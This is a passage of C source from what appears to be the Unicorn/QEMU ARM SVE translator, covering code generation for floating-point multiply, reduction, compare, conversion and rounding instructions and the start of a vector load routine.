tcg_gen_gvec_4_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vec_full_reg_offset(s, a->ra), status, vsz, vsz, (a->index << 1) | a->sub, fns[a->esz - 1]); tcg_temp_free_ptr(tcg_ctx, status); } return true; } /* *** SVE Floating Point Multiply Indexed Group */ static bool trans_FMUL_zzx(DisasContext *s, arg_FMUL_zzx *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3_ptr * const fns[3] = { gen_helper_gvec_fmul_idx_h, gen_helper_gvec_fmul_idx_s, gen_helper_gvec_fmul_idx_d, }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), status, vsz, vsz, a->index, fns[a->esz - 1]); tcg_temp_free_ptr(tcg_ctx, status); } return true; } /* *** SVE Floating Point Fast Reduction Group */ typedef void gen_helper_fp_reduce(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); static void do_reduce(DisasContext *s, arg_rpr_esz *a, gen_helper_fp_reduce *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); unsigned p2vsz = pow2ceil(vsz); TCGv_i32 t_desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, p2vsz, 0)); TCGv_ptr t_zn, t_pg, status; TCGv_i64 temp; temp = tcg_temp_new_i64(tcg_ctx); t_zn = tcg_temp_new_ptr(tcg_ctx); t_pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_zn, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rn)); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); fn(tcg_ctx, temp, t_zn, t_pg, status, t_desc); tcg_temp_free_ptr(tcg_ctx, t_zn); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_ptr(tcg_ctx, status); tcg_temp_free_i32(tcg_ctx, t_desc); write_fp_dreg(s, a->rd, temp); tcg_temp_free_i64(tcg_ctx, temp); } #define DO_VPZ(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rpr_esz *a) \ { \ static gen_helper_fp_reduce * const fns[3] = { \ gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, \ gen_helper_sve_##name##_d, \ }; \ if (a->esz == 0) { \ return false; \ } \ if (sve_access_check(s)) { \ do_reduce(s, a, fns[a->esz - 1]); \ } \ return true; \ } DO_VPZ(FADDV, faddv) DO_VPZ(FMINNMV, fminnmv) DO_VPZ(FMAXNMV, fmaxnmv) DO_VPZ(FMINV, fminv) DO_VPZ(FMAXV, fmaxv) /* *** SVE Floating Point Unary Operations - Unpredicated Group */ static void do_zz_fp(DisasContext *s, arg_rr_esz *a, gen_helper_gvec_2_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_2_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), status, vsz, vsz, 0, fn); tcg_temp_free_ptr(tcg_ctx, status); } static bool trans_FRECPE(DisasContext *s, arg_rr_esz *a) { static gen_helper_gvec_2_ptr * const fns[3] = { gen_helper_gvec_frecpe_h, gen_helper_gvec_frecpe_s, gen_helper_gvec_frecpe_d, }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { do_zz_fp(s, a, fns[a->esz - 1]); } return true; } static bool trans_FRSQRTE(DisasContext *s, arg_rr_esz *a) { static gen_helper_gvec_2_ptr * const fns[3] = { gen_helper_gvec_frsqrte_h, gen_helper_gvec_frsqrte_s, gen_helper_gvec_frsqrte_d, }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { do_zz_fp(s, a, fns[a->esz - 1]); } return true; } /* *** SVE Floating Point Compare with Zero Group */ static void do_ppz_fp(DisasContext *s, arg_rpr_esz *a, gen_helper_gvec_3_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_3_ptr(tcg_ctx, pred_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), pred_full_reg_offset(s, a->pg), status, vsz, vsz, 0, fn); tcg_temp_free_ptr(tcg_ctx, status); } #define DO_PPZ(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rpr_esz *a) \ { \ static gen_helper_gvec_3_ptr * const fns[3] = { \ gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, \ gen_helper_sve_##name##_d, \ }; \ if (a->esz == 0) { \ return false; \ } \ if (sve_access_check(s)) { \ do_ppz_fp(s, a, fns[a->esz - 1]); \ } \ return true; \ } DO_PPZ(FCMGE_ppz0, fcmge0) DO_PPZ(FCMGT_ppz0, fcmgt0) DO_PPZ(FCMLE_ppz0, fcmle0) DO_PPZ(FCMLT_ppz0, fcmlt0) DO_PPZ(FCMEQ_ppz0, fcmeq0) DO_PPZ(FCMNE_ppz0, fcmne0) #undef DO_PPZ /* *** SVE floating-point trig multiply-add coefficient */ static bool trans_FTMAD(DisasContext *s, arg_FTMAD *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3_ptr * const fns[3] = { gen_helper_sve_ftmad_h, gen_helper_sve_ftmad_s, gen_helper_sve_ftmad_d, }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), status, vsz, vsz, a->imm, fns[a->esz - 1]); tcg_temp_free_ptr(tcg_ctx, status); } return true; } /* *** SVE Floating Point Accumulating Reduction Group */ static bool trans_FADDA(DisasContext *s, arg_rprr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; typedef void fadda_fn(TCGContext *, TCGv_i64, TCGv_i64, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); static fadda_fn * const fns[3] = { gen_helper_sve_fadda_h, gen_helper_sve_fadda_s, gen_helper_sve_fadda_d, }; unsigned vsz = vec_full_reg_size(s); TCGv_ptr t_rm, t_pg, t_fpst; TCGv_i64 t_val; TCGv_i32 t_desc; if (a->esz == 0) { return false; } if (!sve_access_check(s)) { return true; } t_val = load_esz(tcg_ctx, tcg_ctx->cpu_env, vec_reg_offset(s, a->rn, 0, a->esz), a->esz); t_rm = tcg_temp_new_ptr(tcg_ctx); t_pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_rm, tcg_ctx->cpu_env, vec_full_reg_offset(s, a->rm)); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); t_fpst = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); t_desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); fns[a->esz - 1](tcg_ctx,t_val, t_val, t_rm, t_pg, t_fpst, t_desc); tcg_temp_free_i32(tcg_ctx, t_desc); tcg_temp_free_ptr(tcg_ctx, t_fpst); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_ptr(tcg_ctx, t_rm); write_fp_dreg(s, a->rd, t_val); tcg_temp_free_i64(tcg_ctx, t_val); return true; } /* *** SVE Floating Point Arithmetic - Unpredicated Group */ static bool do_zzz_fp(DisasContext *s, arg_rrr_esz *a, gen_helper_gvec_3_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (fn == NULL) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), status, vsz, vsz, 0, fn); tcg_temp_free_ptr(tcg_ctx, status); } return true; } #define DO_FP3(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rrr_esz *a) \ { \ static gen_helper_gvec_3_ptr * const fns[4] = { \ NULL, gen_helper_gvec_##name##_h, \ gen_helper_gvec_##name##_s, gen_helper_gvec_##name##_d \ }; \ return do_zzz_fp(s, a, fns[a->esz]); \ } DO_FP3(FADD_zzz, fadd) DO_FP3(FSUB_zzz, fsub) DO_FP3(FMUL_zzz, fmul) DO_FP3(FTSMUL, ftsmul) DO_FP3(FRECPS, recps) DO_FP3(FRSQRTS, rsqrts) #undef DO_FP3 /* *** SVE Floating Point Arithmetic - Predicated Group */ static bool do_zpzz_fp(DisasContext *s, arg_rprr_esz *a, gen_helper_gvec_4_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (fn == NULL) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_4_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), pred_full_reg_offset(s, a->pg), status, vsz, vsz, 0, fn); tcg_temp_free_ptr(tcg_ctx, status); } return true; } #define DO_FP3(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rprr_esz *a) \ { \ static gen_helper_gvec_4_ptr * const fns[4] = { \ NULL, gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, gen_helper_sve_##name##_d \ }; \ return do_zpzz_fp(s, a, fns[a->esz]); \ } DO_FP3(FADD_zpzz, fadd) DO_FP3(FSUB_zpzz, fsub) DO_FP3(FMUL_zpzz, fmul) DO_FP3(FMIN_zpzz, fmin) DO_FP3(FMAX_zpzz, fmax) DO_FP3(FMINNM_zpzz, fminnum) DO_FP3(FMAXNM_zpzz, fmaxnum) DO_FP3(FABD, fabd) DO_FP3(FSCALE, fscalbn) DO_FP3(FDIV, fdiv) DO_FP3(FMULX, fmulx) #undef DO_FP3 typedef void gen_helper_sve_fp2scalar(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i64, TCGv_ptr, TCGv_i32); static void do_fp_scalar(DisasContext *s, int zd, int zn, int pg, bool is_fp16, TCGv_i64 scalar, gen_helper_sve_fp2scalar *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_ptr t_zd, t_zn, t_pg, status; TCGv_i32 desc; t_zd = tcg_temp_new_ptr(tcg_ctx); t_zn = tcg_temp_new_ptr(tcg_ctx); t_pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_zd, tcg_ctx->cpu_env, vec_full_reg_offset(s, zd)); tcg_gen_addi_ptr(tcg_ctx, t_zn, tcg_ctx->cpu_env, vec_full_reg_offset(s, zn)); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, pg)); status = get_fpstatus_ptr(tcg_ctx, is_fp16); desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); fn(tcg_ctx, t_zd, t_zn, t_pg, scalar, status, desc); tcg_temp_free_i32(tcg_ctx, desc); tcg_temp_free_ptr(tcg_ctx, status); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_ptr(tcg_ctx, t_zn); tcg_temp_free_ptr(tcg_ctx, t_zd); } static void do_fp_imm(DisasContext *s, arg_rpri_esz *a, uint64_t imm, gen_helper_sve_fp2scalar *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 temp = tcg_const_i64(tcg_ctx, imm); do_fp_scalar(s, a->rd, a->rn, a->pg, a->esz == MO_16, temp, fn); tcg_temp_free_i64(tcg_ctx, temp); } #define DO_FP_IMM(NAME, name, const0, const1) \ static bool trans_##NAME##_zpzi(DisasContext *s, arg_rpri_esz *a) \ { \ static gen_helper_sve_fp2scalar * const fns[3] = { \ gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, \ gen_helper_sve_##name##_d \ }; \ static uint64_t const val[3][2] = { \ { float16_##const0, float16_##const1 }, \ { float32_##const0, float32_##const1 }, \ { float64_##const0, float64_##const1 }, \ }; \ if (a->esz == 0) { \ return false; \ } \ if (sve_access_check(s)) { \ do_fp_imm(s, a, val[a->esz - 1][a->imm], fns[a->esz - 1]); \ } \ return true; \ } #define float16_two make_float16(0x4000) #define float32_two make_float32(0x40000000) #define float64_two make_float64(0x4000000000000000ULL) DO_FP_IMM(FADD, fadds, half, one) DO_FP_IMM(FSUB, fsubs, half, one) DO_FP_IMM(FMUL, fmuls, half, two) DO_FP_IMM(FSUBR, fsubrs, half, one) DO_FP_IMM(FMAXNM, fmaxnms, zero, one) DO_FP_IMM(FMINNM, fminnms, zero, one) DO_FP_IMM(FMAX, fmaxs, zero, one) DO_FP_IMM(FMIN, fmins, zero, one) #undef DO_FP_IMM static bool do_fp_cmp(DisasContext *s, arg_rprr_esz *a, gen_helper_gvec_4_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (fn == NULL) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_4_ptr(tcg_ctx, pred_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), pred_full_reg_offset(s, a->pg), status, vsz, vsz, 0, fn); tcg_temp_free_ptr(tcg_ctx, status); } return true; } #define DO_FPCMP(NAME, name) \ static bool trans_##NAME##_ppzz(DisasContext *s, arg_rprr_esz *a) \ { \ static gen_helper_gvec_4_ptr * const fns[4] = { \ NULL, gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, gen_helper_sve_##name##_d \ }; \ return do_fp_cmp(s, a, fns[a->esz]); \ } DO_FPCMP(FCMGE, fcmge) DO_FPCMP(FCMGT, fcmgt) DO_FPCMP(FCMEQ, fcmeq) DO_FPCMP(FCMNE, fcmne) DO_FPCMP(FCMUO, fcmuo) DO_FPCMP(FACGE, facge) DO_FPCMP(FACGT, facgt) #undef DO_FPCMP static bool trans_FCADD(DisasContext *s, arg_FCADD *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_4_ptr * const fns[3] = { gen_helper_sve_fcadd_h, gen_helper_sve_fcadd_s, gen_helper_sve_fcadd_d }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_4_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), pred_full_reg_offset(s, a->pg), status, vsz, vsz, a->rot, fns[a->esz - 1]); tcg_temp_free_ptr(tcg_ctx, status); } return true; } typedef void gen_helper_sve_fmla(TCGContext *, TCGv_env, TCGv_ptr, TCGv_i32); static bool do_fmla(DisasContext *s, arg_rprrr_esz *a, gen_helper_sve_fmla *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (fn == NULL) { return false; } if (!sve_access_check(s)) { return true; } unsigned vsz = vec_full_reg_size(s); unsigned desc; TCGv_i32 t_desc; TCGv_ptr pg = tcg_temp_new_ptr(tcg_ctx); /* We would need 7 operands to pass these arguments "properly". * So we encode all the register numbers into the descriptor. */ desc = deposit32(a->rd, 5, 5, a->rn); desc = deposit32(desc, 10, 5, a->rm); desc = deposit32(desc, 15, 5, a->ra); desc = simd_desc(vsz, vsz, desc); t_desc = tcg_const_i32(tcg_ctx, desc); tcg_gen_addi_ptr(tcg_ctx, pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); fn(tcg_ctx, tcg_ctx->cpu_env, pg, t_desc); tcg_temp_free_i32(tcg_ctx, t_desc); tcg_temp_free_ptr(tcg_ctx, pg); return true; } #define DO_FMLA(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rprrr_esz *a) \ { \ static gen_helper_sve_fmla * const fns[4] = { \ NULL, gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, gen_helper_sve_##name##_d \ }; \ return do_fmla(s, a, fns[a->esz]); \ } DO_FMLA(FMLA_zpzzz, fmla_zpzzz) DO_FMLA(FMLS_zpzzz, fmls_zpzzz) DO_FMLA(FNMLA_zpzzz, fnmla_zpzzz) DO_FMLA(FNMLS_zpzzz, fnmls_zpzzz) #undef DO_FMLA static bool trans_FCMLA_zpzzz(DisasContext *s, arg_FCMLA_zpzzz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_sve_fmla * const fns[3] = { gen_helper_sve_fcmla_zpzzz_h, gen_helper_sve_fcmla_zpzzz_s, gen_helper_sve_fcmla_zpzzz_d, }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); unsigned desc; TCGv_i32 t_desc; TCGv_ptr pg = tcg_temp_new_ptr(tcg_ctx); /* We would need 7 operands to pass these arguments "properly". * So we encode all the register numbers into the descriptor. */ desc = deposit32(a->rd, 5, 5, a->rn); desc = deposit32(desc, 10, 5, a->rm); desc = deposit32(desc, 15, 5, a->ra); desc = deposit32(desc, 20, 2, a->rot); desc = sextract32(desc, 0, 22); desc = simd_desc(vsz, vsz, desc); t_desc = tcg_const_i32(tcg_ctx, desc); tcg_gen_addi_ptr(tcg_ctx, pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); fns[a->esz - 1](tcg_ctx, tcg_ctx->cpu_env, pg, t_desc); tcg_temp_free_i32(tcg_ctx, t_desc); tcg_temp_free_ptr(tcg_ctx, pg); } return true; } static bool trans_FCMLA_zzxz(DisasContext *s, arg_FCMLA_zzxz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3_ptr * const fns[2] = { gen_helper_gvec_fcmlah_idx, gen_helper_gvec_fcmlas_idx, }; tcg_debug_assert(a->esz == 1 || a->esz == 2); tcg_debug_assert(a->rd == a->ra); if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), status, vsz, vsz, a->index * 4 + a->rot, fns[a->esz - 1]); tcg_temp_free_ptr(tcg_ctx, status); } return true; } /* *** SVE Floating Point Unary Operations Predicated Group */ static bool do_zpz_ptr(DisasContext *s, int rd, int rn, int pg, bool is_fp16, gen_helper_gvec_3_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, is_fp16); tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), pred_full_reg_offset(s, pg), status, vsz, vsz, 0, fn); tcg_temp_free_ptr(tcg_ctx, status); } return true; } static bool trans_FCVT_sh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvt_sh); } static bool trans_FCVT_hs(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvt_hs); } static bool trans_FCVT_dh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvt_dh); } static bool trans_FCVT_hd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvt_hd); } static bool trans_FCVT_ds(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvt_ds); } static bool trans_FCVT_sd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvt_sd); } static bool trans_FCVTZS_hh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_fcvtzs_hh); } static bool trans_FCVTZU_hh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_fcvtzu_hh); } static bool trans_FCVTZS_hs(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_fcvtzs_hs); } static bool trans_FCVTZU_hs(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_fcvtzu_hs); } static bool trans_FCVTZS_hd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_fcvtzs_hd); } static bool trans_FCVTZU_hd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_fcvtzu_hd); } static bool trans_FCVTZS_ss(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzs_ss); } static bool trans_FCVTZU_ss(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzu_ss); } static bool trans_FCVTZS_sd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzs_sd); } static bool trans_FCVTZU_sd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzu_sd); } static bool trans_FCVTZS_ds(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzs_ds); } static bool trans_FCVTZU_ds(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzu_ds); } static bool trans_FCVTZS_dd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzs_dd); } static bool trans_FCVTZU_dd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_fcvtzu_dd); } static gen_helper_gvec_3_ptr * const frint_fns[3] = { gen_helper_sve_frint_h, gen_helper_sve_frint_s, gen_helper_sve_frint_d }; static bool trans_FRINTI(DisasContext *s, arg_rpr_esz *a) { if (a->esz == 0) { return false; } return do_zpz_ptr(s, a->rd, a->rn, a->pg, a->esz == MO_16, frint_fns[a->esz - 1]); } static bool trans_FRINTX(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3_ptr * const fns[3] = { gen_helper_sve_frintx_h, gen_helper_sve_frintx_s, gen_helper_sve_frintx_d }; if (a->esz == 0) { return false; } return do_zpz_ptr(s, a->rd, a->rn, a->pg, a->esz == MO_16, fns[a->esz - 1]); } static bool do_frint_mode(DisasContext *s, arg_rpr_esz *a, int mode) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); TCGv_i32 tmode = tcg_const_i32(tcg_ctx, mode); TCGv_ptr status = get_fpstatus_ptr(tcg_ctx, a->esz == MO_16); gen_helper_set_rmode(tcg_ctx, tmode, tmode, status); tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), pred_full_reg_offset(s, a->pg), status, vsz, vsz, 0, frint_fns[a->esz - 1]); gen_helper_set_rmode(tcg_ctx, tmode, tmode, status); tcg_temp_free_i32(tcg_ctx, tmode); tcg_temp_free_ptr(tcg_ctx, status); } return true; } static bool trans_FRINTN(DisasContext *s, arg_rpr_esz *a) { return do_frint_mode(s, a, float_round_nearest_even); } static bool trans_FRINTP(DisasContext *s, arg_rpr_esz *a) { return do_frint_mode(s, a, float_round_up); } static bool trans_FRINTM(DisasContext *s, arg_rpr_esz *a) { return do_frint_mode(s, a, float_round_down); } static bool trans_FRINTZ(DisasContext *s, arg_rpr_esz *a) { return do_frint_mode(s, a, float_round_to_zero); } static bool trans_FRINTA(DisasContext *s, arg_rpr_esz *a) { return do_frint_mode(s, a, float_round_ties_away); } static bool trans_FRECPX(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3_ptr * const fns[3] = { gen_helper_sve_frecpx_h, gen_helper_sve_frecpx_s, gen_helper_sve_frecpx_d }; if (a->esz == 0) { return false; } return do_zpz_ptr(s, a->rd, a->rn, a->pg, a->esz == MO_16, fns[a->esz - 1]); } static bool trans_FSQRT(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_3_ptr * const fns[3] = { gen_helper_sve_fsqrt_h, gen_helper_sve_fsqrt_s, gen_helper_sve_fsqrt_d }; if (a->esz == 0) { return false; } return do_zpz_ptr(s, a->rd, a->rn, a->pg, a->esz == MO_16, fns[a->esz - 1]); } static bool trans_SCVTF_hh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_scvt_hh); } static bool trans_SCVTF_sh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_scvt_sh); } static bool trans_SCVTF_dh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_scvt_dh); } static bool trans_SCVTF_ss(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_scvt_ss); } static bool trans_SCVTF_ds(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_scvt_ds); } static bool trans_SCVTF_sd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_scvt_sd); } static bool trans_SCVTF_dd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_scvt_dd); } static bool trans_UCVTF_hh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_ucvt_hh); } static bool trans_UCVTF_sh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_ucvt_sh); } static bool trans_UCVTF_dh(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, true, gen_helper_sve_ucvt_dh); } static bool trans_UCVTF_ss(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_ucvt_ss); } static bool trans_UCVTF_ds(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_ucvt_ds); } static bool trans_UCVTF_sd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_ucvt_sd); } static bool trans_UCVTF_dd(DisasContext *s, arg_rpr_esz *a) { return do_zpz_ptr(s, a->rd, a->rn, a->pg, false, gen_helper_sve_ucvt_dd); } /* *** SVE Memory - 32-bit Gather and Unsized Contiguous Group */ /* Subroutine loading a vector register at VOFS of LEN bytes. * The load should begin at the address Rn + IMM. */ static void do_ldr(DisasContext *s, uint32_t vofs, int len, int rn, int imm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int len_align = QEMU_ALIGN_DOWN(len, 8); int len_remain = len % 8; int nparts = len / 8 + ctpop8(len_remain); int midx = get_mem_index(s); TCGv_i64 addr, t0, t1; addr = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); /* Note that unpredicated load/store of vector/predicate registers * are defined as a stream of bytes, which equates to little-endian * operations on larger quantities. There is no nice way to force * a little-endian load for aarch64_be-linux-user out of line. * * Attempt to keep code expansion to a minimum by limiting the * amount of unrolling done. */ if (nparts <= 4) { int i; for (i = 0; i < len_align; i += 8) { tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, rn), imm + i); tcg_gen_qemu_ld_i64(tcg_ctx, t0, addr, midx, MO_LEQ); tcg_gen_st_i64(tcg_ctx, t0, tcg_ctx->cpu_env, vofs + i); } } else { TCGLabel *loop = gen_new_label(tcg_ctx); TCGv_ptr tp, i = tcg_const_local_ptr(tcg_ctx, 0); gen_set_label(tcg_ctx, loop); /* Minimize the number of local temps that must be re-read from * the stack each iteration. Instead, re-compute values other * than the loop counter. */ tp = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, tp, i, imm); tcg_gen_extu_ptr_i64(tcg_ctx, addr, tp); tcg_gen_add_i64(tcg_ctx, addr, addr, cpu_reg_sp(s, rn)); 